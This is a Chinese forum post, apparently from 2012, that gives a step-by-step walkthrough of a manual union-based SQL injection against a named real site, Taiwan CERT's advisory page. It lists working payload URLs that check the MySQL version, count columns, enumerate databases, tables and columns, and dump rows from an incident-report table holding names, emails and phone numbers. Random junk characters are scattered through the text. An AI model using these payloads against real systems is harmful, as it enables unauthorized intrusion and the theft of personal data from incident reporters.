1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
/ E& [4 t: i+ k. l( ~& _3 O2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解/ A3 w7 g: J! P3 N& t' w: ^9 h
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9-- }! S/ V0 [2 ]; o" g
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--; C( |0 _" J, P- \" V- T
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。8 N9 j2 [1 ^0 |3 B; Q8 ^
4.判断有没有写权限: \ w( ]. J3 b. f( m# _0 ^
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
' C' N4 n" ^! [+ p8 F: j没办法,手动猜表啦3 ~7 k+ ^8 e, Z& Q: u6 B
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
+ U8 K6 q8 |4 E- E但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下0 E. G5 l" B/ Q' P( Q, a+ J Z
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
+ N4 {% ~6 ?% T7 U+ H成功查出所有数据库,国外的黑客就是不一般。数据库如下:% s u* T( t2 }0 M
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb% Q8 R5 h- E7 p) ^& R$ u
6.爆表,爆的是twcert库
% Q" A9 }5 N4 b0 M$ xhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--9 k- H% S' a% {, k2 G0 ]3 {
爆出如下表0 v% y( x" p) }. t/ q" l1 o
downloadfile,irsys,newsdata,secrpt,secrpt_big5, ]) ~; O; F I; X5 G5 u
7.爆列名,这次爆的是irsys表
; W l1 F0 [1 V- [http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--# I9 n+ F7 s: C N$ P1 i: j
爆出如下列 Z" [6 V3 T. D4 F
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status9 n8 ]) y9 X. q! L% t" ^
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
6 D& y% u( y4 }) ?% X3 g" Hhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
7 n8 k& y$ N. s) H1 n/ t返回是3,说明每个列里有3个地段
U# s* J: T6 W1 D2 k8 Z0 J8 y9.爆字段内容. z" ^0 }4 V$ S( g9 N& Y9 L
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
6 q& G4 Y5 n7 D$ S爆出name列的第一个字段的内容
4 M2 M5 M( J0 e% S2 D! a/ Dhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--( y& {! _* i7 X+ n$ l% P o
爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对